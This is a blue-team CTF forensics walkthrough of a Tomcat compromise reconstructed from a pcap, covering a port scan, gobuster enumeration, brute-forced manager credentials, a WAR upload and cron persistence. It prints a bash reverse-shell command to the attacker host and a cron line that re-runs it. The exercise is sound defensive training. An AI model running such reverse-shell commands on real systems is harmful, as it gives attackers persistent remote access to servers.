# Tomcat Takeover Blue Team Challenge
:::success
https://cyberdefenders.org/blueteam-ctf-challenges/135#nav-questions
:::
:::info
Scenario:
Our SOC team has detected suspicious activity on one of the web servers within the company's intranet. In order to gain a deeper understanding of the situation, the team has captured network traffic for analysis. This pcap file potentially contains a series of malicious activities that have resulted in the compromise of the Apache Tomcat web server. We need to investigate this incident further.
Tools:
Wireshark
NetworkMiner
:::
#### 1. Given the suspicious activity detected on the web server, the pcap analysis shows a series of requests across various ports, suggesting a potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?
```
14.0.0.120
```
In the Conversations view there is a single external IP, 14.0.0.120.

The I/O Graphs show a short burst of a very large number of packets between 20:17 and 20:20.

Filtering on the external IP 14.0.0.120 shows port-scanning behaviour.

#### 2. Based on the identified IP address associated with the attacker, can you ascertain the city from which the attacker's activities originated?
```
GUANGZHOU
```
WHOIS lookup of 14.0.0.120.

#### 3. From the pcap analysis, multiple open ports were detected as a result of the attacker's activity scan. Which of these ports provides access to the web server admin panel?
```
8080
```
After filtering out the port-scan packets from 14.0.0.120 to 10.0.0.112, the remaining traffic shows that 14.0.0.120 talks to 10.0.0.112 mainly over port 8080. Among those packets there is also one POST /manager/html/upload on port 8080 that uploads a file named JXQOZY.war.

#### 4. Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?
```
gobuster
```
14.0.0.120 uses two User-Agent strings: one is the Firefox browser, the other is gobuster.

gobuster is a web directory brute-forcing tool.

#### 5. Subsequent to their efforts to enumerate directories on our web server, the attacker made numerous requests trying to identify administrative interfaces. Which specific directory associated with the admin panel was the attacker able to uncover?
```
/manager
```
During the enumeration the attacker found that the /manager directory exposes a large number of usable commands.

#### 6. Upon accessing the admin panel, the attacker made attempts to brute-force the login credentials. From the data, can you identify the correct username and password combination that the attacker successfully used for authorization?
```
admin:tomcat
```
Looking at the packets, there is a run of consecutive Unauthorized responses.

Following the TCP stream confirms that when the Authorization value is YWRtaW46dG9tY2F0, the server replies 200.

Decode it with base64.

It can also be seen in the Credentials field of the packet details.
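As an added example (not part of this writeup), the Python below automates the same check: walk the request/response pairs from the followed TCP stream, count the Unauthorized responses, and base64-decode the Authorization value of the attempt that got a 200. The sample exchanges and the helper names are my own constructed assumptions, not data from the challenge pcap.

```python
import base64
import re
from collections import Counter

# Constructed sample of what "Follow TCP Stream" shows for the admin-panel login
# attempts: (request line, Authorization header value, response status line).
# Illustrative only, not the challenge's captured traffic.
SAMPLE_EXCHANGES = [
    ("GET /manager/html HTTP/1.1", "Basic YWRtaW46YWRtaW4=", "HTTP/1.1 401 Unauthorized"),
    ("GET /manager/html HTTP/1.1", "Basic dG9tY2F0OnRvbWNhdA==", "HTTP/1.1 401 Unauthorized"),
    ("GET /manager/html HTTP/1.1", "Basic YWRtaW46cGFzc3dvcmQ=", "HTTP/1.1 401 Unauthorized"),
    ("GET /manager/html HTTP/1.1", "Basic YWRtaW46dG9tY2F0", "HTTP/1.1 200 OK"),
]


def decode_basic(header_value):
    """Return (user, password) from a 'Basic <base64>' value, or None if malformed."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


def status_code(status_line):
    """Extract the numeric status from an HTTP status line, or None."""
    m = re.match(r"HTTP/\d\.\d (\d{3})", status_line)
    return int(m.group(1)) if m else None


def analyze_logins(exchanges, threshold=3):
    """Summarise Basic-auth attempts: failures per credential, successes, and
    whether the failure count reaches the brute-force alert threshold."""
    failed = Counter()
    succeeded = []
    for _request_line, auth, status_line in exchanges:
        creds = decode_basic(auth)
        if creds is None:
            continue
        code = status_code(status_line)
        if code == 401:
            failed[creds] += 1
        elif code is not None and 200 <= code < 300:
            succeeded.append(creds)
    total_failed = sum(failed.values())
    return {
        "failed_attempts": total_failed,
        "distinct_failed": len(failed),
        "succeeded": succeeded,
        "brute_force_suspected": total_failed >= threshold,
    }
```

Run on the real stream, each element of the list is one request/response pair that Wireshark's Follow TCP Stream displays.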

#### 7. Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?
```
JXQOZY.war
```
From the earlier search results, the attacker used /manager/html/upload to upload a file named JXQOZY.war.

#### 8. Upon successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?
```
/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
```
Looking at the packets after the reverse shell is established and following the TCP stream, the attacker first runs basic commands such as whoami and pwd, then writes the bash command that creates the reverse shell into a cron schedule so that the reverse shell is re-established continuously.

```
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'" > cron
```

References:
https://ithelp.ithome.com.tw/m/articles/10323534